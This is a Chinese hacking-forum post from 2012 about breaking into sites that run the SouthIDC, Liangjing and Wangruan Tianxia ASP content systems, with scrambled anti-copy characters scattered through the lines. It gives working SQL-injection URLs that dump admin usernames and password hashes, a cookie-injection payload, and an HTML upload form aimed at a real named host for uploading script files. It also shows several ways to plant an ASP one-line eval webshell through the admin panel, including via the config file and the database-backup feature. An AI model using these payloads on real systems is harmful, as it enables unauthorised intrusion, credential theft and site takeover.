找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2435|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb
% C) f/ @8 v* V; ]7 f+ N, x7 t( k1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 * z) O5 r5 Y5 u- H- s
也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
2 P0 i" c2 o+ W3 l' c) u5 P) t( b直接暴管理员帐号密码(md5); ^+ a4 S: s" D& C! @
2.登陆后台
' v& T3 W$ Z/ E3 m2 U3.利用编辑器上传:
1 f+ m6 R& y/ H, n$ n+ u: Y/ _& h访问admin/southidceditor/admin_style.asp
- J  O, Z" [) j0 J& W% V9 _修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.
/ k/ ^3 Y9 V2 i1 @$ f. {: k) n! j7 T7 ]( V4 v6 T
========================================' w4 C% H. q% J: d

& g( P( l! Q* C2 y3 r$ R参考资料整理:8 E& `) L8 \0 u' N
南方数据、良精系统、网软天下漏洞利用* W9 j) R9 g, I5 s4 J7 ?1 \
4 \; l8 U, O# J
1、通过upfile_other.asp漏洞文件直接取SHELL
$ N" P! ~, \# T直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:( q! @3 O2 i+ ~
<HTML><HEAD>
) k( ^  _1 `" o  x<META http-equiv=Content-Type content="text/html; charset=gb2312"> ' S, i5 j5 @4 Y3 u
<STYLE type=text/css>BODY {
4 o2 [) G% J) ?, V: D) }1 }$ r3 r9 `FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee # _2 Q- e7 B/ |* I6 ~6 O  n. |
}
# {6 G" x% m1 H.tx1 { ! ~/ m- `' c: D
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px 0 ~- X$ O- i4 K; v% L+ V6 w
} : j: t( U! m$ N
</STYLE>
% |& @2 p+ O7 [- @! O<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>   c# q/ |6 _" X% c7 ^4 K$ s9 H
<BODY leftMargin=0 topMargin=0> 3 T! `$ `' j# ?5 |2 k! Y
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post 6 T: v) B, R3 P  C7 I
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit> ) D4 I* l2 {5 X
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
, p/ {: [; y! V# J/ G
) y0 I7 E. C* k/ s& S$ _2 I将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。  ^2 g# H- w6 c. {" h
注:此方法通杀南方数据、良精系统、网软天下等
8 v' i6 f& |. w9 N$ D% N9 Z) v! R6 c& Z1 ^" X! Y
2、通过注入秒杀管理员帐号密码,使用如下:( N, z6 A  Q2 J0 v$ k: g
http://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’0 V' s, J1 ?- v
以上代码直接暴管理员帐号和密码,取SHELL方法如下:
4 R) k+ j8 X3 h2 F  E% u在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’3 ~; {  i2 O' x9 p* A% ?
成功把shell写入http://www.target.com/inc/config.asp
$ I4 G+ L% }% B) b2 I; q这里一句话chr(32)密码是“#”
3 c- e; C) P( Z4 R7 A1 X3、cookie注入7 d# g' f) u4 z7 {8 C* K3 L5 f
清空地址栏,利用union语句来注入,提交:
6 m  l! S% ?; ^& l% u  rjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))9 Q0 ]7 J0 o1 L+ O  S2 |
如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?
" Q+ {: P3 J% o$ K注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。7 c9 C: m" c3 p8 q( I' G* V. V) m! [& Y
(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)' {8 m5 d  s' S  k% d/ i2 \% ]

; v! ^0 Q8 k2 z& [# P4 F* k三、后台取SHELL方法总结
6 R, ^- J8 ?0 Z9 v0 ](1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:
0 c" }( |* u' ]! M! u; N然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,' G% `. O: p; g7 _* l7 f
这时再打开一句话马的客户端,提交同样得到一个小马
4 d# T, p9 r$ Y4 w2 _9 O/ B: \(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)  [' g7 Z& Y2 x: \. i
(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:7 \% o* A4 S' V/ z" t+ q$ M
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
( e& B7 |& S: |0 y* Y4 ]# TEnableUpload=false
. u& i: a8 _9 h/ K2 C+ H1 i+ V; X- H& c: K9 ?+ ]
end if - k1 e+ p( ~! y
if EnableUpload=false then: _6 Q" j( p' b; u' g+ ~* X
msg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType
7 z" ~/ [" |8 X. V1 U1 b' _: FFoundErr=true! A4 W! N# L4 b' c
end if, |+ [$ ~  n: N$ \( A5 m5 K& i; \& X
大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:& B! q3 n7 R: Y6 y+ \2 k
提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)1 Q7 q1 n- D0 l5 t
(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的+ k( D+ E3 U. s! y$ A  N
, w9 `/ e  f) @. ~
点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的
8 V7 R1 k- R0 c" n* _1 A直接访问备份后的地址,就得到一个webshell
3 |8 t7 A& Y9 i! a' |  ~(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表